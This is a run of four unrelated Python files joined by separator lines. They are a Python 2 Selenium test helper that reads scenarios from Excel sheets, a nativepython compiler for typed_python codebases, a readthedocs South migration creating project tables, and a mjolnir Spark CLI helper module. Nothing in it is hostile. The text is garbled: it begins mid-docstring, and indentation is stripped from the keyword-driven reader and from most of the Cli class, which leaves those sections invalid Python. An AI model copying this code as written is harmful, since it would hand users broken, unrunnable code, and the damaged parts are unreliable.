    selector constant; the element is everything after the first ``=`` (the
    whole string when there is none).  Raises for an unrecognised prefix.
    """
    # Ordered dispatch table: first matching predicate wins.
    dispatch = [
        (lambda n: n.startswith("css="), SELECTOR_CSS),
        (lambda n: n.startswith("xpath=") or n.startswith("//"), SELECTOR_XPATH),
        (lambda n: n.startswith("id="), SELECTOR_ID),
        (lambda n: n.startswith("link="), SELECTOR_LINK),
        (lambda n: n.startswith("name=") or n.find("=") == -1, SELECTOR_NAME),
        (lambda n: n.startswith("class="), SELECTOR_CLASS),
        (lambda n: n.startswith("tag="), SELECTOR_TAG),
    ]
    for matches, selector_type in dispatch:
        if matches(element_name):
            # everything after the first '=' -- the full string when absent
            return (selector_type, element_name.split('=', 1)[-1])
    raise Exception("Incorrect element %s.It should be one of type:css,xpath,id,link,name,class,tag." %element_name)
def get_data_driven_scenario_values(scenario_id=1,xls_file=DEF_DATA_PATH,sheet_name="Data"):
    """Read the login/select test data for one scenario from an xls sheet.

    Scans column 1 of the sheet for *scenario_id*, then reads up to 5 rows
    below it, mapping the key cells (CELL_USER, CELL_PWD in the 'login'
    column; CELL_ANSWER, CELL_EXPECTED in the 'select' column) to the value
    stored one column to the right.  Returns the populated dict, or None on
    any error (the error is printed, not raised).
    """
    # column indices of the relevant xls columns
    data_xls_keys_cols={'scenario':1,'login':2,'select':4}
    data_driven_data={CELL_USER:'',CELL_PWD:'',CELL_ANSWER:'',CELL_EXPECTED:''}
    try:
        # NOTE(review): if easyExcel() itself raises, xls_sheet is unbound and
        # the finally clause below raises a NameError -- consider guarding.
        xls_sheet=easyExcel(xls_file,sheet_name)
        last_row=xls_sheet.get_sheet_last_row(sheet_name)
        found=False
        scenario_row=0
        # locate the row where this scenario starts (rows are 1-based here)
        for row in range(1,last_row):
            if xls_sheet.getCell(row,data_xls_keys_cols['scenario'])==scenario_id:
                found=True
                scenario_row=row
                break
        if found is False:
            raise Exception('Scenarion %s not found in xls file %s sheet %s' %(scenario_id,xls_file,sheet_name))
        #stop at finding blank value or exit at index 5
        for index_row in range(scenario_row,scenario_row+5):
            # a blank 'login' cell marks the end of the scenario
            if xls_sheet.getCell(index_row,data_xls_keys_cols['login'])==None:
                break
            if xls_sheet.getCell(index_row,data_xls_keys_cols['login'])==CELL_USER:
                #actual values is one column to the right
                data_driven_data[CELL_USER]=xls_sheet.getCell(index_row,data_xls_keys_cols['login']+1)
            if xls_sheet.getCell(index_row,data_xls_keys_cols['login'])==CELL_PWD:
                data_driven_data[CELL_PWD]=xls_sheet.getCell(index_row,data_xls_keys_cols['login']+1)
            if xls_sheet.getCell(index_row,data_xls_keys_cols['select'])==CELL_ANSWER:
                data_driven_data[CELL_ANSWER]=xls_sheet.getCell(index_row,data_xls_keys_cols['select']+1)
            if xls_sheet.getCell(index_row,data_xls_keys_cols['select'])==CELL_EXPECTED:
                data_driven_data[CELL_EXPECTED]=xls_sheet.getCell(index_row,data_xls_keys_cols['select']+1)
            # NOTE(review): dead code -- the for loop reassigns index_row each
            # iteration, so this increment has no effect.
            index_row=index_row+1
        return data_driven_data
    except Exception,ex:
        print ex
        return None
    finally:
        xls_sheet.close()
def get_simple_hybrid_driven_scenario_values(scenario_id=1,xls_file=DEF_DATA_PATH,sheet_name="HybridSimple"):
    """Read the hybrid-driven test steps for one scenario from an xls sheet.

    Locates *scenario_id* in column 1, then reads up to 5 rows below it.
    Each row names a framework function (remember-me, login, select-answer,
    show-answer) with its '&&'-separated parameters one column to the right.
    Returns a list of {FRAMEWORK_FUNCTIONS, PARAMETERS} dicts in sheet
    order, or None on any error (the error is printed, not raised).
    """
    # column indices of the relevant xls columns
    data_xls_keys_cols={'scenario':1,'function':2,'parameters':3}
    # template for one step; deep-copied per row so PARAMETERS lists are not shared
    hybrid_driven_dict={FRAMEWORK_FUNCTIONS:'',PARAMETERS:[]}
    hybrid_driven_data=[] #list of dictionaries of hybrid_driven_dict type
    try:
        # NOTE(review): if easyExcel() itself raises, xls_sheet is unbound and
        # the finally clause below raises a NameError -- consider guarding.
        xls_sheet=easyExcel(xls_file,sheet_name)
        last_row=xls_sheet.get_sheet_last_row(sheet_name)
        found=False
        scenario_row=0
        # locate the row where this scenario starts (rows are 1-based here)
        for row in range(1,last_row):
            if xls_sheet.getCell(row,data_xls_keys_cols['scenario'])==scenario_id:
                found=True
                scenario_row=row
                break
        if found is False:
            raise Exception('Scenarion %s not found in xls file %s sheet %s' %(scenario_id,xls_file,sheet_name))
        #stop at finding blank value or exit at index 5
        for index_row in range(scenario_row,scenario_row+5):
            # a blank 'function' cell marks the end of the scenario
            if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==None:
                break
            temp_hybrid_dict=copy.deepcopy(hybrid_driven_dict)
            if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==CELL_F_REMEMBER_ME:
                temp_hybrid_dict[FRAMEWORK_FUNCTIONS]=CELL_F_REMEMBER_ME
                if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
                    temp_hybrid_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
            if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==CELL_F_LOGIN:
                temp_hybrid_dict[FRAMEWORK_FUNCTIONS]=CELL_F_LOGIN
                if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
                    temp_hybrid_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
            if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==CELL_F_SELECT_ANSWER:
                temp_hybrid_dict[FRAMEWORK_FUNCTIONS]=CELL_F_SELECT_ANSWER
                if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
                    temp_hybrid_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
            if xls_sheet.getCell(index_row,data_xls_keys_cols['function'])==CELL_F_SHOW_ANSWER:
                temp_hybrid_dict[FRAMEWORK_FUNCTIONS]=CELL_F_SHOW_ANSWER
                if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
                    temp_hybrid_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
            hybrid_driven_data.append(temp_hybrid_dict)
            # NOTE(review): dead code -- the for loop reassigns index_row each
            # iteration, so this increment has no effect.
            index_row=index_row+1
        return hybrid_driven_data
    except Exception,ex:
        print ex
        return None
    finally:
        xls_sheet.close()
def get_keywords_driven_scenario_values(scenario_id=1,xls_file=DEF_DATA_PATH,sheet_name="Keyword"):
data_xls_keys_cols={'scenario':1,'action':2,'window':3,'locator':4,'parameters':5}
keyword_driven_dict={FRAMEWORK_FUNCTIONS:'',PARAMETERS:[],PAGE_WINDOW:'',LOCATOR:''}
keyword_driven_data=[] #list of dictionaries of keyword_driven_dict type
try:
xls_sheet=easyExcel(xls_file,sheet_name)
last_row=xls_sheet.get_sheet_last_row(sheet_name)
found=False
scenario_row=0
for row in range(1,last_row):
if xls_sheet.getCell(row,data_xls_keys_cols['scenario'])==scenario_id:
found=True
scenario_row=row
break
if found is False:
raise Exception('Scenarion %s not found in xls file %s sheet %s' %(scenario_id,xls_file,sheet_name))
#get next scenario
for next_row in range(scenario_row,last_row):
if xls_sheet.getCell(row,data_xls_keys_cols['scenario'])!=None:
next_scenario_row=next_row
#stop at finding blank value or next scenario value
for index_row in range(scenario_row,next_scenario_row):
if xls_sheet.getCell(index_row,data_xls_keys_cols['action'])==None:
break
temp_keyword_dict=copy.deepcopy(keyword_driven_dict)
temp_keyword_dict[FRAMEWORK_FUNCTIONS]=xls_sheet.getCell(index_row,data_xls_keys_cols['action'])
if xls_sheet.getCell(index_row,data_xls_keys_cols['window'])!=None:
temp_keyword_dict[PAGE_WINDOW]=xls_sheet.getCell(index_row,data_xls_keys_cols['window'])
if xls_sheet.getCell(index_row,data_xls_keys_cols['locator'])!=None:
temp_keyword_dict[LOCATOR]=xls_sheet.getCell(index_row,data_xls_keys_cols['locator'])
if xls_sheet.getCell(index_row,data_xls_keys_cols['parameters'])!=None:
temp_keyword_dict[PARAMETERS]=xls_sheet.getCell(index_row,data_xls_keys_cols['parameters']).split("&&")
keyword_driven_data.append(temp_keyword_dict)
index_row=index_row+1
return keyword_driven_data
except Exception,ex:
print ex
return None
finally:
xls_sheet.close()
|
# Copyright 2019 Nativepython Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nativepython.python_to_native_converter as python_to_native_converter
import nativepython.native_ast as native_ast
import nativepython.llvm_compiler as llvm_compiler
import nativepython
import ctypes
import tempfile
import os
from typed_python import _types
from typed_python import Function, NoneType
from typed_python import Codebase
from typed_python.internals import FunctionOverload
# Shorthand: resolve a typed_python type to its nativepython type wrapper.
typeWrapper = lambda t: python_to_native_converter.typedPythonTypeToTypeWrapper(t)
class CompiledCodebase:
    """A typed_python Codebase together with its compiled shared object and
    the metadata needed to install native function pointers into it."""
    def __init__(self, codebase, sharedObject, nativeTargets, typedTargets):
        # codebase: the typed_python.Codebase this was compiled from
        # sharedObject: compiled shared-object produced by the llvm compiler
        # nativeTargets: native function definitions, keyed by link name
        # typedTargets: {wrappingCallTargetName: (typed function, call target)}
        self.codebase = codebase
        self.sharedObject = sharedObject
        self.nativeTargets = nativeTargets
        self.typedTargets = typedTargets
    def install(self):
        """Link the shared object into this process and patch every typed
        function with its native entry point."""
        compiler = llvm_compiler.Compiler()
        function_pointers = compiler.link_binary_shared_object(
            self.sharedObject,
            self.nativeTargets,
            # binary artifacts live under the codebase's __pycache__
            os.path.join(self.codebase.rootDirectory, "__pycache__", "nativepython")
        )
        for wrappingCallTargetName, (f,callTarget) in self.typedTargets.items():
            fp = function_pointers[wrappingCallTargetName]
            # NoneType stands in for a missing (void) output type
            f._installNativePointer(
                fp.fp,
                callTarget.output_type.typeRepresentation if callTarget.output_type is not None else NoneType,
                [i.typeRepresentation for i in callTarget.input_types]
            )
class CodebaseCompiler:
    """Compiles every compilable entrypoint of a typed_python Codebase into
    one shared object, exposed as a CompiledCodebase."""
    def __init__(self, codebase):
        self.codebase = codebase
        self.llvm_compiler = llvm_compiler.Compiler()
        self.converter = python_to_native_converter.PythonToNativeConverter()
        # order matters: walking populates self.targets and the converter's
        # pending definitions, which compileModule then extracts
        self.walkCodebase()
        self.compiledCodebase = self.compileModule()
    @staticmethod
    def compile(codebase):
        """Compile a typed_python.Codebase into a CompiledCodebase."""
        return CodebaseCompiler(codebase).compiledCodebase
    def walkCodebase(self):
        """Walk a typed_python.Codebase and convert all valid entrypoints.

        We find all 'Class' objects and all 'Function' objects at module
        level, and convert them all for compilation into a single module.
        """
        functions = []
        for name, object in self.codebase.allModuleLevelValues():
            if hasattr(object, '__typed_python_category__'):
                if object.__typed_python_category__ == "Class":
                    for f in object.MemberFunctions.values():
                        functions.append(f)
                if object.__typed_python_category__ == "Function":
                    functions.append(object)
        # {wrappingCallTargetName: (typed function, call target)}
        self.targets = {}
        for f in functions:
            self._convert(f, None)
    def compileModule(self):
        """Compile everything the converter produced into one shared object."""
        native_targets = self.converter.extract_new_function_definitions()
        sharedObject = self.llvm_compiler.compile_functions_and_return_shared_object(native_targets)
        return CompiledCodebase(self.codebase, sharedObject, native_targets, self.targets)
    def _convert(self, f, argument_types):
        """Recursively convert a Function / BoundMethod / FunctionOverload.

        argument_types maps argument names to type overrides; it is consumed
        (popped) while building the overload's input wrappers, so a leftover
        entry means a name that matched no argument.
        """
        argument_types = argument_types or {}
        if isinstance(f, FunctionOverload):
            for a in f.args:
                assert not a.isStarArg, 'dont support star args yet'
                assert not a.isKwarg, 'dont support keyword yet'
            def chooseTypeFilter(a):
                # explicit override wins; fall back to the declared filter or object
                return argument_types.pop(a.name, a.typeFilter or object)
            input_wrappers = [typeWrapper(chooseTypeFilter(a)) for a in f.args]
            if len(argument_types):
                raise Exception("No argument exists for type overrides %s" % argument_types)
            callTarget = self.converter.convert(f.functionObj, input_wrappers, f.returnType, assertIsRoot=True)
            assert callTarget is not None
            wrappingCallTargetName = self.converter.generateCallConverter(callTarget)
            self.targets[wrappingCallTargetName] = (f, callTarget)
        if hasattr(f, '__typed_python_category__') and f.__typed_python_category__ == 'Function':
            for o in f.overloads:
                self._convert(o, argument_types)
            return f
        if hasattr(f, '__typed_python_category__') and f.__typed_python_category__ == 'BoundMethod':
            for o in f.Function.overloads:
                # bind the receiver's type as the first argument's override
                arg_types = dict(argument_types)
                arg_types[o.args[0].name] = typeWrapper(f.Class)
                self._convert(o, arg_types)
            return f
|
<filename>readthedocs/projects/migrations/0001_initial.py<gh_stars>1-10
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """Initial South schema migration: creates the Project, File and
    FileRevision tables for the projects app.

    Auto-generated migration -- keep the schema definitions verbatim.
    """
    def forwards(self, orm):
        """Create the projects_project, projects_file and
        projects_filerevision tables."""
        # Adding model 'Project'
        db.create_table('projects_project', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='projects', to=orm['auth.User'])),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
            ('description', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('repo', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
            ('docs_directory', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
            ('project_url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
            ('pub_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified_date', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('version', self.gf('django.db.models.fields.CharField')(max_length=100, blank=True)),
            ('copyright', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
            ('theme', self.gf('django.db.models.fields.CharField')(default='default', max_length=20)),
            ('path', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('suffix', self.gf('django.db.models.fields.CharField')(default='.rst', max_length=10)),
            ('extensions', self.gf('django.db.models.fields.CharField')(default='', max_length=255)),
            ('status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
        ))
        db.send_create_signal('projects', ['Project'])
        # Adding model 'File'
        db.create_table('projects_file', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(related_name='files', to=orm['projects.Project'])),
            ('parent', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='children', null=True, to=orm['projects.File'])),
            ('heading', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
            ('content', self.gf('django.db.models.fields.TextField')()),
            ('denormalized_path', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('ordering', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
            ('status', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1)),
        ))
        db.send_create_signal('projects', ['File'])
        # Adding model 'FileRevision'
        db.create_table('projects_filerevision', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('file', self.gf('django.db.models.fields.related.ForeignKey')(related_name='revisions', to=orm['projects.File'])),
            ('comment', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('diff', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('created_date', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('revision_number', self.gf('django.db.models.fields.IntegerField')()),
            ('is_reverted', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ))
        db.send_create_signal('projects', ['FileRevision'])
    def backwards(self, orm):
        """Drop the three tables created by forwards()."""
        # Deleting model 'Project'
        db.delete_table('projects_project')
        # Deleting model 'File'
        db.delete_table('projects_file')
        # Deleting model 'FileRevision'
        db.delete_table('projects_filerevision')
    # Frozen ORM definitions South uses to reconstruct model state.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'projects.file': {
            'Meta': {'ordering': "('denormalized_path',)", 'object_name': 'File'},
            'content': ('django.db.models.fields.TextField', [], {}),
            'denormalized_path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'heading': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ordering': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['projects.File']"}),
            'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'files'", 'to': "orm['projects.Project']"}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
            'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'})
        },
        'projects.filerevision': {
            'Meta': {'ordering': "('-revision_number',)", 'object_name': 'FileRevision'},
            'comment': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'diff': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'file': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'revisions'", 'to': "orm['projects.File']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_reverted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'revision_number': ('django.db.models.fields.IntegerField', [], {})
        },
        'projects.project': {
            'Meta': {'ordering': "('-modified_date', 'name')", 'object_name': 'Project'},
            'copyright': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'docs_directory': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
            'extensions': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'project_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'repo': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
            'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
            'suffix': ('django.db.models.fields.CharField', [], {'default': "'.rst'", 'max_length': '10'}),
            'theme': ('django.db.models.fields.CharField', [], {'default': "'default'", 'max_length': '20'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects'", 'to': "orm['auth.User']"}),
            'version': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
        }
    }
    complete_apps = ['projects']
|
"""CLI application definition helpers
Implements CLI argument handling for transformation
utilities.
"""
from argparse import ArgumentParser
from collections import OrderedDict
from functools import wraps
import json
import os
from typing import cast, Callable, Dict, List, Mapping, Optional
import uuid
try:
from pyspark.sql import DataFrame, SparkSession
except ImportError as ex:
try:
import findspark
except ImportError:
# If findspark isn't available re-raise the original error
raise ex
else:
findspark.init()
from pyspark.sql import DataFrame, SparkSession
from mjolnir.utils import as_output_file, hdfs_open_read, hdfs_rmdir
import mjolnir.transform as mt
METADATA_FILE_NAME = '_METADATA.JSON'
def write_metadata(dir_path, metadata) -> None:
    """Serialize *metadata* as JSON into the standard metadata file of *dir_path*."""
    target = os.path.join(dir_path, METADATA_FILE_NAME)
    with as_output_file(target, overwrite=True) as sink:
        json.dump(metadata, sink)
def read_metadata(dir_path) -> Mapping:
    """Load the JSON metadata stored in the standard metadata file of *dir_path*."""
    source = os.path.join(dir_path, METADATA_FILE_NAME)
    with hdfs_open_read(source) as handle:
        return json.load(handle)
def _wiki_features(df: DataFrame, wiki: str) -> List[str]:
    """Feature names for *wiki*, honoring per-wiki feature metadata when present."""
    meta = df.schema['features'].metadata
    try:
        per_wiki = meta['wiki_features']
    except KeyError:
        # no per-wiki breakdown; a single feature list applies to all wikis
        return meta['features']
    return per_wiki[wiki]
def feature_vector_stats(df: DataFrame) -> Mapping:
    """Calculate stats of feature vector partitions necessary for executor auto-sizing.

    Expects the input dataframe to either be cached, or read directly from
    disk. Will iterate over the dataframe multiple times. Signature matches
    stats_fn of write_partition function.
    """
    # per-wiki observation counts (triggers one spark job)
    num_obs = {row['wikiid']: row['count']
               for row in df.groupBy('wikiid').count().collect()}
    # feature-name lists, read from the 'features' column metadata per wiki
    features = {wiki: _wiki_features(df, wiki) for wiki in num_obs.keys()}
    return {'num_obs': num_obs, 'wiki_features': features}
class HivePartition:
    """Lazy accessor for one partition of a hive table: its dataframe, its
    on-disk location, and the mjolnir metadata stored next to it."""
    def __init__(self, spark, table, partition_spec, direct_parquet_read=False):
        self._spark = spark
        self.table = table
        # partition_spec: key/value pairs identifying the partition
        self.partition_spec = partition_spec
        # lazily populated caches for df / metadata
        self._df = cast(Optional[DataFrame], None)
        self._metadata = cast(Optional[Mapping], None)
        self._direct_parquet_read = direct_parquet_read
    @property
    def df(self) -> DataFrame:
        """Pyspark dataframe for specified partition"""
        if self._df is None:
            self._df = mt.read_partition(
                self._spark, self.table, self.partition_spec,
                direct_parquet_read=self._direct_parquet_read)
        return self._df
    @property
    def input_dir(self) -> str:
        """Path to partition data"""
        # derive the directory from the files spark actually read;
        # a partition is expected to live in exactly one directory
        paths = list(self.df._jdf.inputFiles())  # type: ignore
        dirs = {os.path.dirname(path) for path in paths}
        if len(dirs) != 1:
            raise Exception('multiple paths for [{}] [{}]: {}'.format(
                self.table, self.partition_spec, ','.join(dirs)))
        return next(iter(dirs))
    @property
    def metadata(self) -> Mapping:
        """Mjolnir specific metadata for specified partition"""
        if self._metadata is None:
            self._metadata = read_metadata(self.input_dir)
        return self._metadata
    def partition_value(self, key):
        """Lookup value in partition key/value pairs"""
        return dict(self.partition_spec)[key]
class CallQueue:
    """A FIFO of callbacks that are all invoked, and drained, when called.

    Items are popped one at a time, so a callback that appends further
    callbacks while the queue is draining gets them run in the same drain.
    """
    def __init__(self):
        self._queue = []

    def __call__(self, *args, **kwargs):
        # Drain front-to-back; every callback receives the same arguments.
        while self._queue:
            callback = self._queue.pop(0)
            callback(*args, **kwargs)

    def append(self, fn):
        """Enqueue *fn* and return it, so this also works as a decorator."""
        self._queue.append(fn)
        return fn
class Cli:
    def __init__(self, name: str, transformer: Callable, parser: ArgumentParser):
        """Wire a transformation callable to a CLI argument parser.

        name: script name (informational)
        transformer: callable invoked with the parsed args as kwargs
        parser: the ArgumentParser that arguments are registered on
        """
        self.name = name
        self.transformer = transformer
        self.parser = parser
        # hook queues, run in registration order at the matching phase
        self._post_process_args = CallQueue()
        self._post_process_transform = CallQueue()
        self._cleanup = CallQueue()
        # Default args for all scripts
        self.add_argument('--date', required=True)
def __call__(self, **kwargs):
spark = SparkSession.builder.getOrCreate()
self._post_process_args(spark, kwargs)
try:
maybe_df = self.transformer(spark=spark, **kwargs)
self._post_process_transform(maybe_df, kwargs)
finally:
self._cleanup()
@wraps(ArgumentParser.add_argument)
def add_argument(self, *args, **kwargs):
return self.parser.add_argument(*args, **kwargs)
def require_kafka_arguments(self):
self.add_argument('--brokers', required=True)
self.add_argument('--topic-request', required=True)
self.add_argument('--topic-response', required=True)
def require_daily_input_table(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['df_in'] = spark.read.table(kwargs['input_table']) \
.drop('year', 'month', 'day')
self.add_argument('--input-table', required=True)
def require_query_clicks_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['query_clicks'] = HivePartition(
spark, kwargs['clicks_table'], {
'date': kwargs['date'],
})
self.add_argument('--clicks-table', required=True)
def require_query_clustering_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['query_clustering'] = HivePartition(
spark, kwargs['clustering_table'], {
'date': kwargs['date'],
'algorithm': kwargs['clustering_algorithm'],
})
self.add_argument('--clustering-table', required=True)
self.add_argument('--clustering-algorithm', required=True)
def require_labeled_query_page_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['labeled_query_page'] = HivePartition(
spark, kwargs['labels_table'], {
'date': kwargs['date'],
'algorithm': kwargs['labeling_algorithm'],
})
self.add_argument('--labels-table', required=True)
self.add_argument('--labeling-algorithm')
def require_feature_vectors_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['feature_vectors'] = HivePartition(
spark, kwargs['feature_vectors_table'], {
'date': kwargs['date'],
'feature_set': kwargs['feature_set']
}, direct_parquet_read=True)
self.add_argument('--feature-vectors-table', required=True)
self.add_argument('--feature-set', required=True)
def require_training_files_partition(self):
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict) -> None:
kwargs['training_files'] = read_metadata(
kwargs['training_files_path'])
self.add_argument('--training-files-path', required=True)
def require_model_parameters_partition(self, only_table=False):
self.add_argument('--model-parameters-table', required=True)
if not only_table:
raise NotImplementedError("TODO")
@staticmethod
def _resolve_partition_spec(kwargs, partition_spec_spec) -> Dict[str, str]:
# Bypass, typically repeating an input partitions
# partition spec.
if callable(partition_spec_spec):
return OrderedDict(partition_spec_spec(kwargs))
# Partition always starts with date
partition_spec = cast(Dict[str, str], OrderedDict())
partition_spec['date'] = kwargs['date']
for k, v in partition_spec_spec:
partition_spec[k] = v.format(**kwargs)
return partition_spec
def require_output_table(
self, partition_spec_spec, metadata_fn=None,
mode='overwrite',
):
@self._post_process_transform.append
def post(df: DataFrame, kwargs: Dict):
mt.write_partition(
df, kwargs['output_table'], kwargs['output_path'],
self._resolve_partition_spec(kwargs, partition_spec_spec),
mode=mode)
if metadata_fn is not None:
spark = df.sql_ctx.sparkSession
metadata = metadata_fn(spark.read.parquet(kwargs['output_path']))
write_metadata(kwargs['output_path'], metadata)
self.add_argument('--output-table', required=True)
self.add_argument('--output-path', required=True)
def require_temp_dir(self):
state = {}
@self._post_process_args.append
def post(spark: SparkSession, kwargs: Dict):
state['temp_dir'] = '{}-temp-{}'.format(
kwargs['output_path'], uuid.uuid1())
kwargs['temp_dir'] = state['temp_dir']
@self._cleanup.append
def cleanup():
try:
hdfs_rmdir(state['temp_dir'])
except Exception:
pass
def require_output_metadata(self):
@self._post_process_transform.append
def post(metadata: Mapping, kwargs: Dict):
write_metadata(kwargs['output_path'], metadata)
self.add_argument('--output-path', required=True)
|
